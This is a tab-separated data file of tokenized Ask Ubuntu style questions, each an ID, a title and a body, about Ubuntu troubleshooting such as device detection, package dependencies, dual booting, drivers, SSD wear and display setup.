488411	moto x is not recognized on ubuntu 14.04	ubuntu wo n't recognize my phone . it is n't even listed in lsusb output : darlan @ htpc ~ $ lsusb bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 045e:0745 microsoft corp. nano transceiver v1.0 for bluetooth bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub tried adding a rule to udev , with no success , as follows darlan @ htpc ~ $ cat /etc/udev/rules.d/51-android.rules subsystem== '' usb '' , attr { idvendor } == '' 22b8 '' , mode= '' 0666 '' using adb tools with root permission also does n't work darlan @ htpc ~/dev/adt-bundle-linux-x86_64-20140321/sdk/platform-tools $ sudo ./adb devices list of devices attached could anyone shed some light on the matter ? my kernel version is 3.13.0-24-generic , and i would gladly provide more information . thanks
488412	what does ' but it is not installable ' mean ?	i noticed when i try some packages , i get sometimes this error : < pkg_name > depends : < an_other_pkg > ( > = version x.x.x ) but it is not installable . what does is mean ' but it is not installable . ' ?
488414	toshiba printers compatible with ubuntu ?	are toshiba printers generally compatible with ubuntu ?
488421	ifuse : no version information available	i run : sudo ifuse /mnt/myiphone/ i got this error : ifuse : /usr/local/lib/libxml2.so.2 : no version information available ( required by /usr/lib/libplist.so.1 ) how can i fix this ?
488432	skype and qjackctl	i have ubuntu studio 14.04 and qjackctl with guitarx works just fine , but for some reason i ca n't get qjackctl to function when skype is running . the moment i am in a skype call it 's like qjackctl just doesnt ' connect to anything anymore . but the program window stays up . things i have tried : -having qjackctl and guitarx up and running , tested and it 's working . then started a skype call and suddenly no sound from guitar anymore . -starting skype call first then starting qjackctl and guitarx but guitarx says jackd is n't running ( that window comes up that asks what you want to do ) . i have tried telling guitarx to start it but it says it could n't be started and i have tried ignoring it sense qjackctl was actually already up and running . not sure what is going on but i would like to have this working so i can do sessions over skype like lessons and show friends what i have came up with . i do n't need to send my guitarx signal through skype , i can just put that through my speakers or monitors and let the skype microphone pick that up . so all i need is qjackctl to function properly with skype in a call . anyone have a clue ?
488434	mounting a unmounted usb drive	i have unmounted my usb drive using gparted . but then i remove the usb drive from computer and reconnect , it is not visible in my computer . how can i make it visible ? ? here is the output from lsblk name maj : min rm size ro type mountpoint sda 8:0 0 465.8g 0 disk ├─sda1 8:1 0 245.4g 0 part / ├─sda2 8:2 0 97.7g 0 part ├─sda3 8:3 0 1k 0 part ├─sda4 8:4 0 120.9g 0 part └─sda5 8:5 0 1.9g 0 part [ swap ] sdb 8:16 1 7.6g 0 disk sr0 11:0 1 1024m 0 rom
488435	cisco vpn configuration steps	i have recently installed ubuntu 14.04 lts on my laptop ( lenovo y560 ) . i do n't have much knowledge on this os , can some one assist me with steps to configure cisco vpn client on my laptop .
488436	how can i download ubuntu packages and take them home for installing ?	i do not have internet at home but i can go to an internet cafe to download things . the thing is i have ubuntu and i do n't no how to download ubuntu-compatible software from another pc and then get it installed on my pc at home . what do i need to do ?
488440	open a cd after burning a file into that via brasero	i burned a file to a cd via brasero data option . after that i ejected cd from cd drive and put on there again . but now , i can not find my cd directory . i also watched /media directory . i did not find my cd drive even in there ? ? ? i also watched disk usage analyzer , but it does not shows me my cd drive .
488441	desktop empty after login ubuntu 14.04	i really need someone 's help . i do n't know waht else to do , i 've read all forums trying all sort of manipulations without managing to solve my problem . after my login my desktop is empty . i do n't know exactly wwhat happend , everything was working well but i think it was after an upate . i can not access the terminal with ( alt+ctrl+t ) only with ( alt+ctrl+fx ) . i 'm running under ubuntu 14.04 lts with virtual box ( windows 8 host ) . i 've tried ( among others ) : unity -- replace and i have the following error : compiz ( core ) - error : plugin 'opengl ' not loaded i 'm not an expert with linux but i can do some basic stuff . so please i 'll do everything you tell me : ) thank you !
488442	how do i know how much was written to an ssd over its lifetime ?	to assess the remaining reliability of my ssd i would like to know how much was written to an ssd over its lifetime . how can i learn this ?
488443	vlc broken after last update	ubuntu unity 14.04 lts 64bit . i have been faithfully downloading and installing all updates . last night everything was fine . i 've downloaded two or three updates since then , and now when i try to run vlc i got errors . i then did apt-get remove vlc , apt-get autoremove , and finally sudo apt-get install vlc this is what i get : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : vlc : depends : vlc-nox ( = 2.1.4-0ubuntu14.04.1 ) but 2.1.5~ppa1 is to be installed recommends : vlc-plugin-notify ( = 2.1.4-0ubuntu14.04.1 ) but it is not going to be installed recommends : vlc-plugin-pulse ( = 2.1.4-0ubuntu14.04.1 ) but it is not going to be installed e : unable to correct problems , you have held broken package . so now what can i do ? : (
488450	how to make a .jar file execute on ubuntu server 14 startup	how do i make my .jar file execute on startup because we have constant blackouts here and when the server starts up i want the server.jar to start as well . is there any simple way of doing this ?
488451	knote/sticky note widget text location	i had several note widgets on plasma desktop . where are the notes saved ? i have a problem with plasma-desktop and it is not run . but i need the notes . where can i find them ?
488455	error : while configure dejagnu-1.5.1	i am first time working on building linux from scratch ( lfs ) . i followed the lfs 7.5 document for configure the dejagnu-1.5.1 . but it gives an error . please help ! ! ! error : checking for a bsd-compatible install ... /tools/bin/install -c checking whether build environment is sane ... yes /mnt/lfs/sources/dejagnu-1.5.1/missing : unknown ` -- is-lightweight ' option try `/mnt/lfs/sources/dejagnu-1.5.1/missing -- help ' for more information configure : warning : 'missing ' script is too old or missing checking for a thread-safe mkdir -p ... /tools/bin/mkdir -p checking for gawk ... gawk checking whether make sets $ ( make ) ... yes checking whether make supports nested variables ... yes checking whether to enable maintainer-specific portions of makefiles ... no checking whether make sets $ ( make ) ... ( cached ) yes checking for gcc ... gcc checking whether the c compiler works ... yes checking for c compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking for style of include used by make ... gnu checking dependency style of gcc ... gcc3 checking for g++ ... g++ checking whether we are using the gnu c++ compiler ... yes checking whether g++ accepts -g ... yes checking dependency style of g++ ... gcc3 checking for docbook2html ... false checking for docbook2rtf ... false checking for docbook2pdf ... false checking for docbook2ps ... false checking for docbook2x-texi ... false checking for expect ... /tools/bin/expect checking tcl version 8.3 or greater ... configure : error : tcl 8.3 or greater is required while the tcl 8.6 is already installed on the lfs . i also run the tclsh in the tools/bin directory . it gives me segmentation fault . i am stuck due to this problem . can anyone answer me ? ? ?
488458	i am a sixth form student who needs to use 3d cad software for my project . any clue on how to do this ?	i have been given windows running copies of the software , but am unsure as to whether there is a reliable , safe way to run the software without ruining the security and reliability of my distro . i no longer have windows as it was wiped from my system . anything to help ?
488465	can i count on ssd to distribute wear evenly ?	i checked my ssd to see how much i have written to it over its lifetime to estimate how much life might be left in it . currently , it the wear amounts to about 50 write cycles , which is n't much , this particular one is rated at 5000 and ssds in general should last at least 1000 . now , the question is : can i count on ssd to distribute its wear more or less equally across all of its cells or 50 cycles on average might as well mean that some cells have endured , say , 500 or more ? if i create partitions on the drive , does wear leveling work across partitions ? e.g . if i created a 8 gb swap partition on a 120 gb drive , did i just subject 1/15 th of the drive to disproportionately higher wear ? maybe i would be better off if i allocated extra space to swap partition , then . i started thinking of this issue specifically because i wanted to enable hibernation on my computer , and i started wondering whether i should ensure there 's space equaling ram on swap partition ( if wear leveling across partitions work ) or several times that ( if it does n't ; to prolong ssd's lifespan ) my ssd is currently intel 520 120gb and i 'm considering using intel and samsung ssds in the future .
488469	why ca n't i install ubuntu ?	i was trying to install ubuntu on my pc , and i have enough space on my computer , but why ca n't i click on the install now button ?
488470	how to enter a chroot without using sudo ?	is it possible to enter a chroot without using sudo ? if so , how ? i 've tried googling , but all i get are results about crouton .
488471	why ca n't i dual-boot with windows 8.1 and ubuntu 14.04 ?	i 've installed windows 8.1 and ubuntu 14.04 in my sony vaio svs13a1s9es and i have n't had any problems during the installation . however , when i turn on the computer , i boot with windows 8.1 and i 'm never asked if i want to boot with ubuntu . i 've been looking for solutions : i 've tried to disable the secure boot of windows but this option does n't appear in bios menu . i neither can boot manually pressing f11 because when i do it the following message appears : `` operative system not found '' . the only way i 've found to boot with ubuntu is by inserting the super grub2 disk cd . the problem is that i usually have to change between ubuntu and windows so i would n't like to carry a cd everywhere to do it . is there any solution for dual-booting without an external device ? thank you in advance
488473	error mounting location : volume does n't implement mount	i try to connect my iphone 5 to ubuntu . i downloaded this script and followed the steps required there to connect my iphone . i run : gvfs-mount -l i got : drive ( 0 ) : cd/dvd drive type : gproxydrive ( gproxyvolumemonitorgdu ) volume ( 0 ) : iphone type : gproxyvolume ( gproxyvolumemonitorgphoto2 ) i run : sudo ./mount-iphone.sh mount i got : error mounting location : volume does n't implement mount mounted iphone with serial c969fd26a24de082c3d22cd0cf3d67f3a24164c1 my mounting point is : /media/iphone . ls does not display anything in it .
488474	dinotrace installation	was trying to install dinotrace viewer . instructions at : http : //www.veripool.org/projects/dinotrace/wiki/installing got the following error in make install command : *** lisp files not installed , you may want to *** cd lisp ; make install type setenv display :0.0 then dinotrace to test . abhishek @ abhishek-inspiron-5520 : ~/downloads/dinotrace-9.4d $ what do i need to do ? i installed emacs using sudo apt-get install emacs but that does n't help
488476	how to setup a small network	i 'm trying to create a small network for experimental reasons what i need is to get two machines ( a ip and a laptop ) to connect to each other through an access point which will be connected to the pc . i 'm not sure of how to assign ip 's to each device , the ap which is a wireless ap has an ip off 192.168.1.90
488477	ideviceinfo does not work	i run : ideviceinfo : i got : ideviceinfo : /usr/local/lib/libxml2.so.2 : no version information available ( required by /usr/lib/libplist.so.1 ) how can i resolve this problem ?
488478	ubuntu boots up and becomes unresponsive as soon as i see the desktop	this is happening very frequently with my ubuntu 12.04 lts . i am unable to see anything on the status bar ( the ui elements which show wifi strength , battery status etc ) and it remains blank . i am unable to do anything and then i have to do a hard reboot after which the problem may/may not persist . how can i rectify this problem ?
488479	is it okay to use a ntfs partition for data to be accessed by windows 7 and ubuntu ?	constantly , i use windows and ubuntu and need to access files on both systems . it sucks to be copying files back and forth and sometimes i forget some file and i have to restart several times . to resolve this i created the following partitions device boot start end blocks id system /dev/sda1 * 2048 1026047 512000 7 hpfs / ntfs / exfat /dev/sda2 1,026,048 35,842,047 17,408,000 27 hidden ntfs winre /dev/sda3 35842048 247212031 105684992 7 hpfs / ntfs / exfat /dev/sda4 247,214,017 1,250,263,039 501,524,511+ f win95 ( lba ) extended partition /dev/sda5 247214080 1053323263 403054592 7 hpfs / ntfs / exfat /dev/sda6 1,053,327,360 1,233,903,615 90,288,128 83 linux /dev/sda7 1,233,905,664 1,250,263,039 8,178,688 82 linux swap / solaris some people and websites say that doing so is not recommended . will i have problems ?
488480	orca not reading webpages neither in firefox or chromium in ubuntu	i am trying to learn to use orca screen reader in ubuntu 13.10 , but even it seems to work on the desktop , when i enter firefox or chromium to read a website , it reads the address , says `` document went read '' and only says `` tab '' , `` tab '' while jumping through the links , but i had not been able to make it read the html document itself .
488483	error : ca n't resolve libraries to shared lib : gobject-2.0 , gllib-2.0	i am trying to build gobject introspection-1.34.2 for arm cross compile on x86 host machine . i am getting below error . | arm-kd-linux-gnueabi-libtool : link : arm-kd-linux-gnueabi-gcc -march=armv7-a -mthumb -mthumb-interwork -mfloat-abi=softfp -mfpu=neon -rdynamic -funwind-tables -d__arm__ -d__linux_arm_arch__=7 -mfpu=neon -mfloat-abi=softfp -mvectorize-with-neon-quad -os -- sysroot=/home/channesh.rao/kd-jun23/build-apple/build-k2/sysroots/k2 -o /home/channesh.rao/kd-jun23/build-apple/build-k2/work/k2-wd-linux-gnueabi/g-ir-core/1.34.2-r0/gobject-introspection-1.34.2/tmp-introspect9hwpub/glib-2.0 -fno-strict-aliasing -wsign-compare -wcast-align -wpointer-arith -wnested-externs -wmissing-prototypes -wmissing-declarations -wchar-subscripts -wall -o2 -pipe -g -feliminate-unused-debug-types /home/channesh.rao/kd-jun23/build-apple/build-k2/work/k2-kd-linux-gnueabi/g-ir-core/1.34.2-r0/gobject-introspection-1.34.2/tmp-introspect9hwpub/glib-2.0.o -pthread -wl , -- export-dynamic -wl , -- export-dynamic /home/channesh.rao/kd-jun23/build-apple/build-k2/sysroots/k2/usr/lib/libgio-2.0.so -lz -lresolv /home/channesh.rao/kd-jun23/build-apple/build-k2/sysroots/k2/usr/lib/libgmodule-2.0.so -ldl /home/channesh.rao/wd-jun23/build-apple/build-k2/sysroots/k2/usr/lib/libgobject-2.0.so /home/channesh.rao/kd-jun23/build-xyz/build-k2/sysroots/k2/usr/lib/libgthread-2.0.so /home/channesh.rao/kd-jun23/build-apple/build-k2/sysroots/k2/usr/lib/libglib-2.0.so -lpthread /home/channesh.rao/kd-jun23/build-apple/build-k2/sysroots/k2/usr/lib/libffi.so -pthread | error : ca n't resolve libraries to shared libraries : gobject-2.0 , glib-2.0 | make [ 2 ] : * [ glib-2.0.gir ] error 1 | make [ 2 ] : leaving directory /home/channesh.rao/kd-jun23/build-apple/build-k2/work/k2-kd-linux-gnueabi/g-ir-core/1.34.2-r0/gobject-introspection-1.34.2 ' | make [ 1 ] : *** [ all-recursive ] error 1 | make [ 1 ] : leaving directory/home/channesh.rao/kd-jun23/build-apple/build-k2/work/k2-kd-linux-gnueabi/g-ir-core/1.34.2-r0/gobject-introspection-1.34.2 ' can anyone help me if you get any solution ? please help me . thanks you .
488485	allowing a group read-write access to a directory	i have two users , user1 and user2 , that are both members of groupa . user2 has a folder in their home directory called foldera . if they wish to allow read-write-execute permissions for all members of groupa , how would they do this ? what if foldera contains many files and additional folders that also need to have read-write-execute permission ? information regarding groups is a little 'spotty ' across the web , so i am putting my question here in the hope someone posts a clear answer that might help others out too . thanks !
488488	how can i upgrade cloud-init ?	i am working on ubuntu 12.04 with cloud-init 0.6.3-0ubuntu1 my question is can i upgrade it to 0.7.5-0ubuntu1.1 ?
488495	adding unallocates space to an extended partition	my existing hdd partition is as below : welcome to gnu parted ! type 'help ' to view a list of commands . ( parted ) print model : ata st1000dm003-1ch1 ( scsi ) disk /dev/sda : 1000gb sector size ( logical/physical ) : 512b/4096b partition table : msdos number start end size type file system flags 1 1049kb 100gb 100gb primary ext4 boot 2 100gb 304gb 204gb extended 5 100gb 104gb 4046mb logical linux-swap ( v1 ) 6 104gb 304gb 200gb logical ext4 i have 648.35 gb unallocated . what i need is as follows : i need a 110 gb hfs+ partition to restore my clonezilla backup of lion os use around 300 gb of the rest of the unallocated space for data through 1 or more logical partitions keep around 200 gb unallocated for any new os or even windows in the future . my questions : 1 . is my planning correct ? or should i be doing something else ? 2 . if my plan is right then i can create the hfs+ partition right away at the end of the unallocated space using gparted right ? this would be a primary partition right at the end of the hdd 3 . for adding 300 gb to my extended partition do i need to use a live cd and then resize ? i do not know how to do this 4 . what else do i need to take care of for in terms of being able to login to use my linux mint ( sda6 ) again without any hassle . i have never done this before , so i want to plan this and get things right and not screw up my existing working mint . so please do feed me explicit steps : ) thanks , ananth
488500	can i install ubuntu 14.04 on sony vaio computers with uefi ?	i have a sony vaio svf14213clb laptop , with a core i3 64-bit processor . this computer has uefi security , and i want to install ubuntu 14.04 . i want to know if the hardware is compatible with ubuntu . i tried to install ubuntu 13.10 32-bit , but when i configure motherboard to legacy in order to boot from the live cd , it does n't work . it reads the disc , but when there is an ubuntu message it seems that it 's loading , but it 's not , and the ubuntu message still there ... maybe this could be because my computer is 64-bit , and that 's why i 'm downloading the ubuntu 14.04 64-bit version . but i want to know if it is compatible with this computer ...
488503	ca n't install ubuntu in lenovo ideapad s300	i can install only windows 8.1 in my laptop . i tried installing ubuntu . it is booting from pendrive . after installing i ca n't access it . only i can access to windows 8.1 how to install ubuntu ?
488504	bluetooth with centrino advanced-n 6235 on ubuntu 14.04	the hardware is present : $ lspci | grep centrino 04:00.0 network controller : intel corporation centrino advanced-n 6235 ( rev 24 ) and the bluetooth , iwlwifi , and iwldvm modules get loaded : $ lsmod | egrep 'iwl|blue' iwldvm 232285 0 mac80211 626557 1 iwldvm iwlwifi 169932 1 iwldvm bluetooth 395423 10 bnep , rfcomm cfg80211 484040 3 iwlwifi , mac80211 , iwldvm indeed , there 's bluetooth output in my startup log : $ dmesg | egrep -i 'iwl|blue' [ 2.598945 ] bluetooth : core ver 2.17 [ 2.598994 ] bluetooth : hci device and connection manager initialized [ 2.599006 ] bluetooth : hci socket layer initialized [ 2.599010 ] bluetooth : l2cap socket layer initialized [ 2.599016 ] bluetooth : sco socket layer initialized [ 2.637552 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 2.637557 ] bluetooth : bnep filters : protocol multicast [ 2.637570 ] bluetooth : bnep socket layer initialized [ 2.683477 ] bluetooth : rfcomm tty layer initialized [ 2.683493 ] bluetooth : rfcomm socket layer initialized [ 2.683501 ] bluetooth : rfcomm ver 1.11 [ 2.802024 ] iwlwifi 0000:04:00.0 : enabling device ( 0000 - > 0002 ) [ 2.802106 ] iwlwifi 0000:04:00.0 : ca n't disable aspm ; os does n't have aspm control [ 2.802169 ] iwlwifi 0000:04:00.0 : irq 106 for msi/msi-x [ 2.829897 ] iwlwifi 0000:04:00.0 : loaded firmware version 18.168.6.1 op_mode iwldvm [ 2.981631 ] iwlwifi 0000:04:00.0 : config_iwlwifi_debug disabled [ 2.981638 ] iwlwifi 0000:04:00.0 : config_iwlwifi_debugfs enabled [ 2.981640 ] iwlwifi 0000:04:00.0 : config_iwlwifi_device_tracing enabled [ 2.981644 ] iwlwifi 0000:04:00.0 : detected intel ( r ) centrino ( r ) advanced-n 6235 agn , rev=0xb0 [ 2.981921 ] iwlwifi 0000:04:00.0 : l1 disabled ; enabling l0s [ 3.054692 ] ieee80211 phy0 : selected rate control algorithm 'iwl-agn-rs' and the wifi portion of the card is working great ! however , the bluetooth device is n't coming up at allâ does n't show up for hcitool , hciconfig , or rfkill , eg : $ hcitool dev devices : $ sudo rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no i 'm on a 64-bit machine , running a headless minimal ubuntu 14.04 : $ lsb_release -r release : 14.04 $ uname -a linux test 3.13.0-29-generic # 53-ubuntu smp wed jun 4 21:00:20 utc 2014 x86_64 x86_64 x86_64 gnu/linux i briefly tried the 3.14 kernel , which seemed no different . i also tried removing and reinserting the the iwlwifi and bluetooth modules . i 've also confirmed the same behaviour as above in the 14.04 live desktop . would appreciate additional thoughts or pointers , thanks . one additional piece of data is syslog output related to bluetoothd : $ sudo cat /var/log/syslog | grep -i bluetoothd jun 26 15:09:54 jackal2 bluetoothd [ 476 ] : dis can not start : gatt is disabled jun 26 15:09:54 jackal2 bluetoothd [ 476 ] : failed to init deviceinfo plugin jun 26 15:09:54 jackal2 bluetoothd [ 476 ] : failed to init proximity plugin jun 26 15:09:54 jackal2 bluetoothd [ 476 ] : failed to init time plugin jun 26 15:09:54 jackal2 bluetoothd [ 476 ] : failed to init alert plugin jun 26 15:09:54 jackal2 bluetoothd [ 476 ] : failed to init thermometer plugin jun 26 15:09:54 jackal2 bluetoothd [ 476 ] : failed to init gatt_example plugin jun 26 15:09:54 jackal2 bluetoothd [ 476 ] : bluetooth management interface initialized are these plugin failures something to investigate ? what is gatt ? i have determined now that this radio and driver work fine with wifi and bluetooth on a different motherboard , so i 'm assuming it 's a hardware conflict with something on the particular motherboard ( a gigabyte j1800n-d2h ) .
488505	why ca n't i cd into any subdirectories of my home folder ?	i am using ubuntu 10.04.1 in a terminal window . when i am in my home user directory like /home/jeg # , i can not cd into any directories below this . for example , if i enter cd downloads , or cd /home/jeg/downloads , i get the message no such file or directory . but when i do a ls command it shows me all the directories and files below /home/jeg . i can go into any other directory , so why is this a special case ?
488509	command menu in aptana studio 3 is not working in ubuntu 14.04	the command menu of aptana studio 3 is not showing in a ubuntu 14.04 . other menu items are working fine . can anybody suggest a solution for this issue ?
488510	no space to upgrade ubuntu 12.04 error message .	i 'm trying to update and upgrade the ubuntu server 12.04 in order to fix the openssl vulnerability ( bring it to the latest version ) . the problem i 'm having with this is that once i download the updates and it works fine , i run the sudo apt-get upgrade and it tells to me to fix some unmet dependencies . i run sudo apt-get -f install and after confirming the upgrade that takes almost 296mb errors out by telling me no space left on device . i 've tried to clean up the boot partition and increased the size of it but still no luck . the root partition is already big enough for that if it 's using it . i 'm thinking it 's not really disk space issue but rather it does n't see the mount . it is unable to create /usr/src/linux-headers-* and errors while processing /var/cache/apt/archives/linux-headers-* . i am running out of ideas how to fix this . help is appreciated .
488511	how to allow a process to have full cpu usage ?	i just want to speed up the response time of a process by letting it use the full cpu not only % 50 of like it 's happening in my case . i want to know if there is a command similar to make -j4 to speed up to compilation time in making row source .
488513	no connection with ethernet	when i installed ubuntu 14.04 my ethernet is not connecting . anyone can help me , please ? networkmanager tool state : disconnected device : eth0 type : wired driver : r8169 state : unavailable default : no hw address : 00:24:1d:13:3d:08 capabilities : carrier detect : yes wired properties carrier : off
488515	ubuntu server bandwith monitoring	i run a program on ubuntu server that runs 24/7 , i 'm after a program that can measure the amount of bandwith it uses ( download and upload seperate if possible ) , i need to be able to see it capturing in real time , aswell as view how much has been uploaded/downloaded . i 'm not a noob to ubuntu server , but i 'm not advanced either , so something `` easyish '' to install/configure/use would be great . it also , has to be command line based , as i run a vps where this will be used . any recommendations will be gratefully received . thanks
488516	`` files '' ca n't be resized	i am not able to change the size of my nautilus window . it is now small . what should i do to restore it to normal size ?
488519	can i use ubuntu to create livecd/dvd/usbs of other distributions ?	ubuntu can be used to create a livedvd or liveusb of ubuntu . but can it also be used to create livecds , livedvds or liveusbs of other linux distributions ? in particular , can it create these using an iso image for a distribution which is not based on ubuntu ? if the included default software is not enough , what other packages are needed ?
488520	compilation of realtek rts5229 driver fails	i 'm currently trying to compile the driver for the sd card reader , a realtek rts5229 , of my new laptop computer . however , when running make , i 'm presented with the following errors : $ make # reduced messages to errors /home/sebastian/ubuntusetup/realtek_rts5229_linux_driver_v1.07/rts5229/rtsx.c:266:2 : error : unknown field ‘proc_info’ specified in initializer .proc_info = proc_info , ^ /home/sebastian/ubuntusetup/realtek_rts5229_linux_driver_v1.07/rts5229/rtsx.c:914:22 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘rtsx_probe’ static int __devinit rtsx_probe ( struct pci_dev *pci , const struct pci_device_id *pci_id ) ^ /home/sebastian/ubuntusetup/realtek_rts5229_linux_driver_v1.07/rts5229/rtsx.c:1069:23 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘rtsx_remove’ static void __devexit rtsx_remove ( struct pci_dev *pci ) ^ /home/sebastian/ubuntusetup/realtek_rts5229_linux_driver_v1.07/rts5229/rtsx.c:1094:11 : error : ‘rtsx_probe’ undeclared here ( not in a function ) .probe = rtsx_probe , ^ /home/sebastian/ubuntusetup/realtek_rts5229_linux_driver_v1.07/rts5229/rtsx.c:1095:2 : error : implicit declaration of function ‘__devexit_p’ [ -werror=implicit-function-declaration ] .remove = __devexit_p ( rtsx_remove ) , ^ /home/sebastian/ubuntusetup/realtek_rts5229_linux_driver_v1.07/rts5229/rtsx.c:1095:24 : error : ‘rtsx_remove’ undeclared here ( not in a function ) .remove = __devexit_p ( rtsx_remove ) , ^ cc1 : some warnings being treated as errors make [ 2 ] : *** [ /home/sebastian/ubuntusetup/realtek_rts5229_linux_driver_v1.07/rts5229/rtsx.o ] error 1 make [ 1 ] : *** [ _module_/home/sebastian/ubuntusetup/realtek_rts5229_linux_driver_v1.07/rts5229 ] error 2 make : *** [ default ] error 2 the errors occur in rtsx.c ( uploaded to my dropbox ) ubuntu trusty x64
488521	ubuntu 12.04 - ssh hang at reading configuration	hi fellow ubuntu users ! i currently have a problem when connecting to remote computers at work . here is the log : openssh_5.9p1 debian-5ubuntu1.4 , openssl 1.0.1 14 mar 2012 debug1 : reading configuration data /home/admin/.ssh/config debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug1 : connecting to cremotecomp [ 192.168.0.52 ] port 22. debug1 : connection established . debug1 : identity file /home/admin/.ssh/id_rsa type -1 debug1 : identity file /home/admin/.ssh/id_rsa-cert type -1 debug1 : identity file /home/admin/.ssh/id_dsa type -1 debug1 : identity file /home/admin/.ssh/id_dsa-cert type -1 debug1 : identity file /home/admin/.ssh/id_ecdsa type -1 debug1 : identity file /home/admin/.ssh/id_ecdsa-cert type -1 debug1 : remote protocol version 2.0 , remote software version openssh_5.9p1 debian-5ubuntu1.4 debug1 : match : openssh_5.9p1 debian-5ubuntu1.4 pat openssh* debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_5.9p1 debian-5ubuntu1.4 debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug1 : kex : server- > client aes128-ctr hmac-md5 none debug1 : kex : client- > server aes128-ctr hmac-md5 none debug1 : sending ssh2_msg_kex_ecdh_init debug1 : expecting ssh2_msg_kex_ecdh_reply debug1 : server host key : ecdsa 47:2d : e9 : d3:0e:98:3c:8f:0e : c2:66:80:09:55:1d:80 the authenticity of host 'cremotecomp ( 192.168.0.52 ) ' ca n't be established . ecdsa key fingerprint is 47:2d : e9 : d3:0e:98:3f : df:0e : c2:66:80:09:55:1d:80 . are you sure you want to continue connecting ( yes/no ) ? there is a `` pause '' of approx . 60 seconds between openssh_5.9p1 debian-5ubuntu1.4 , openssl 1.0.1 14 mar 2012 and debug1 : reading configuration data /home/administrateur/.ssh/config i already set gssapiauthentication and usedns at no as many `` experts '' suggests without improvement . i do n't know where to go now to find a solution . do you have any idea ?
488524	how to mount iso as a device	before formatting my hard drive to dual boot a new install of both windows and xubuntu , i made an iso of my whole ssd and put it on my data hard disk by doing this from a live cd : dd if=/dev/sda of=/data/olddisk.iso . this means it contains all of the partitions on there and meant it would be easy to replace windows ( including the mbr etc . ) if the whole thing went tits-up . now i would like to mount the iso as a normal hard drive so i can mount a partition on that drive ( or mount a specific partition on the iso ) so i can access some of the old files ( specifically my music collection ) that i forgot was on my ssd not my hdd . how would i go about doing this ? p.s . xubuntu is amazing on a powerful pc because the boot time is 2 seconds ! only use win for some games !
488526	14.04 - shortcut keys for volume control do nothing after linux-image-extra-3.13.0-30 update	multimedia key events stopped working . it started after a routine system update , or so it seems . checking the problem , i verified that the problem is not with creating the events , but only with whatever should have responded to the event . ie . in keyboard settings > shortcuts > sound and media i can set the `` volume mute '' to whatever shortcut i want , but it does n't mute the sound . any suggestion what can it be ? which daemon should listen to these events ? a note , maybe related : after the update and reboot , pulse audio suddenly refused to load my configuration file and did not load . after removing the config file it started working again , just the multimedia key events do n't work . edit : i rolled back to v24 as per hannu 's advice . it fixed another problem i did n't notice before : chrome stopped playing youtube sound . but the media keys are still not working . edit 2 : i 've managed to have some progress : using audacious preferences > plugins > hotkeys , i attached the multimedia keys to the operations , and while it is running - the shortcuts work . when it is not running , the keys have not effect . another observation : when running gnome-settings-daemon i get this error message : ** ( gnome-settings-daemon:9334 ) : warning ** : name taken or bus went away - shutting down i think this is the daemon that should have listened to the key events , and it looks like it is not .
488527	bold fonts in mucommander	i have bold fonts in mucommander everywhere under gtk+ theme . i have tried changing styles ( in app menu ) manualy but it did n't help .
488529	pyvenv-3.4 error : returned non-zero exit status 1	when trying to create a virtual environment using the included pyvenv-3.4 that comes with 14.04 , it throws an error : error : command ' [ '/some/directories/bin/python3.4 ' , '-im ' , 'ensurepip ' , ' -- upgrade ' , ' -- default-pip ' ] ' returned non-zero exit status 1 how do i use pyvenv-3.4 with ubuntu 14.04 ?
488533	14.04 lts - amd 3 screens difficulty	done a bit of research and ca n't figure a solution or from what i have read if one exists . i have installed desktop ubuntu 14.04 lts , got it running . downloaded and installed amd catalyst control centre with the latest driver , using amd from fglrx-updates proprietary ( followed https : //help.ubuntu.com/community/binarydriverhowto/amd # installation_via_the_ubuntu_repositories ) . however i ca n't for the life of me get my 3 screens running , i feel that the problem is with the second graphics card not being detected , but i am new to this and am unsure . lspci | grep vga returns : 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] pitcairn xt [ radeon hd 7870 ghz edition ] 02:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] pitcairn xt [ radeon hd 7870 ghz edition ] does this mean the system registers both my hd 7870 radeons ? xrandr says dfp1-5 are disconnected , dfp6 is connected , dfp7 is connected and crt1 is disconnected ( makes sense as 2/3 screens are plugged into dvi ports on first graphics card ) . fglrxinfo returns : display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 7800 series opengl version string : 4.3.12798 compatibility profile context 13.35.1005 and my xorg.conf is : section `` device '' identifier `` default card 0 '' busid `` pci:1 @ 0:0:0 '' endsection section `` device '' identifier `` default card 1 '' busid `` pci:2 @ 0:0:0 '' endsection i know that the graphics card & ports work as everything ran smoothly in win7 and all i have done is install ubuntu . on a side note , in ccc if i enable xinerama , unity seems to crash and i can not get beyond a blank login screen ( after entering my password ) unless i disable it again . so yeah , any advice ? thanks : - )
